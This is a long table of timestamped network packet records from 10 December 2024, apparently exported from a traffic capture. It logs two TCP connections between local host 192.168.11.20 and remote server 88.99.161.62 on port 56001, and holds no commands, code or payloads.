                                                                              Dec 10, 2024 07:01:05.705161095 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.705195904 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.705215931 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.705233097 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.705277920 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.705316067 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.705319881 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.705352068 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.705372095 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.705384970 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.705419064 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.705436945 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.705454111 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.705482960 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.705502987 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.705512047 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.705549002 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.705590010 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.705595970 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.705620050 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.705647945 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.705677032 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.705703974 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.705713987 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.705713987 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.705733061 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.705760956 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.705790043 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.705807924 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.705817938 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.705847025 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.705857038 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.705874920 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.705905914 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.705905914 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.705935001 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.705962896 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.705984116 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.705984116 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.705991983 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.706021070 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.706049919 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.706079006 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.706080914 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.706106901 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.706130028 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.706136942 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.706171989 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.706181049 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.706229925 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.706257105 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.706270933 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.706300974 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.706324100 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.706336975 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.706382036 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.706388950 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.706414938 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.706451893 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.706475973 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:05.706476927 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.706607103 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:05.706737995 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:06.241137028 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:06.456377029 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:06.456604958 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:06.457813978 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:06.672956944 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:06.673115015 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:06.888396025 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:06.888964891 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:07.116972923 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:07.117023945 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:07.145076990 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:07.254838943 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:07.332211971 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:07.332390070 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:07.332449913 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:07.332621098 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:07.406486034 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:07.406585932 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:07.470197916 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:07.547682047 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:07.547904015 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:07.547928095 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:07.557054996 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:07.557164907 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:07.621650934 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:07.621777058 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:07.621794939 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:07.622067928 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:07.704850912 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:07.704904079 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:07.772317886 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:07.772650957 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:07.858903885 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:07.858927965 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:07.859004021 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:07.859169960 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:07.919976950 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:07.919986010 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:07.920250893 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:07.920340061 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:08.004741907 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:08.004765034 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:08.004842997 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:08.005007982 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:08.074882030 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:08.155356884 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:08.155379057 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:08.155462027 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:08.219798088 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:08.219937086 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:08.220181942 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:08.291728973 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:08.291829109 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:08.370446920 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:08.370532036 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:08.370758057 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:08.370910883 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:08.438554049 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:08.438653946 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:08.506818056 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:08.507272005 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:08.592669964 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:08.592775106 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:08.653904915 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:08.654175997 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:08.744760990 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:08.744862080 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:08.807774067 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:08.807782888 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:08.808001041 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:08.896900892 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:08.897003889 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:08.960166931 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:08.961121082 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:09.039048910 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:09.039154053 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:09.111974001 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:09.112066031 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:09.112314939 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:09.112354040 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:09.195103884 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:09.195209026 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:09.254286051 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:09.254576921 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:09.344424963 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:09.344531059 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:09.411102057 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:09.492352962 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:09.492453098 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:09.559649944 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:09.559726954 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:09.559830904 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:09.559853077 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:09.644507885 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:09.644612074 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:09.707525015 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:09.707647085 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:09.707766056 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:09.790642977 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:09.790750980 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:09.859692097 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:09.859982014 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:09.946259975 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:09.946361065 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:10.005840063 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:10.005866051 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:10.006088972 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:10.088556051 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:10.088661909 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:10.161413908 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:10.161434889 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:10.162549973 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:10.228421926 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:10.228524923 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:10.303667068 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:10.303883076 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:10.304054976 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:10.378814936 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:10.378916979 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:10.443644047 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:10.443722963 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:10.443891048 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:10.526042938 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:10.526113987 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:10.595309019 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:10.595320940 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:10.595330000 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:10.675175905 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:10.675271034 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:10.741177082 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:10.741244078 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:10.741503000 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:10.823868036 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:10.823967934 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:10.890654087 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:10.891635895 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:10.980545998 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:10.980644941 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:11.038923025 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:11.039000988 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:11.039194107 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:11.039433956 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:11.125286102 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:11.125413895 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:11.196197987 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:11.197117090 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:11.300108910 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:11.300261021 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:11.340616941 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:11.341553926 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:11.442775965 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:11.442876101 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:11.515300035 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:11.516339064 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:11.591821909 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:11.591898918 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:11.658811092 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:11.726813078 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:11.726881981 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:11.807086945 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:11.808126926 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:11.875406027 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:11.875505924 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:11.942771912 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:12.027793884 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:12.027896881 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:12.091129065 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:12.159004927 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:12.159105062 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:12.247279882 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:12.334172964 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:12.334280014 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:12.374238014 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:12.375253916 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:12.478565931 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:12.478667974 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:12.549891949 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:12.627621889 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:12.627727032 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:12.694319963 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:12.782830954 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:12.782933950 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:12.843632936 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:12.929353952 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:12.929430962 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:12.998821020 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:13.078447104 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:13.078515053 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:13.144613981 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:13.229485035 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:13.229590893 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:13.294121981 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:13.378336906 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:13.378438950 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:13.445436954 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:13.528386116 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:13.528479099 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:13.599132061 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:13.599407911 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:13.663301945 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:13.663407087 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:13.744110107 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:13.812397957 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:13.812499046 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:13.878696918 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:13.879664898 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:13.963680029 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:13.963784933 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:14.028088093 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:14.113468885 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:14.113571882 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:14.179292917 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:14.261256933 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:14.261328936 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:14.328599930 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:14.329575062 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:14.415138006 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:14.415266037 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:14.476455927 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:14.476466894 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:14.476588964 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:14.561032057 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:14.561223984 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:14.630445004 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:14.630472898 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:14.630542040 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:14.630896091 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:14.696878910 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:14.696996927 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:14.776664972 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:14.777637959 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:14.851949930 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:14.852054119 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:14.912529945 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:14.912542105 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:14.912643909 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:14.998064995 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:15.067400932 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:15.067414045 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:15.132370949 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:15.132534027 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:15.213469028 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:15.213511944 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:15.213540077 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:15.278620005 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:15.278714895 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:15.348104954 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:15.348150015 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:15.348176956 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:15.404946089 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:15.418648958 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:15.418821096 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:15.458234072 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:15.494179964 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:15.494477034 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:15.494518995 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:15.563487053 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:15.563575029 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:15.634118080 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:15.634293079 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:15.634325027 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:15.634644985 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:15.677743912 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:15.678935051 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:15.712625980 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:15.712795019 CET4976256001192.168.11.2088.99.161.62
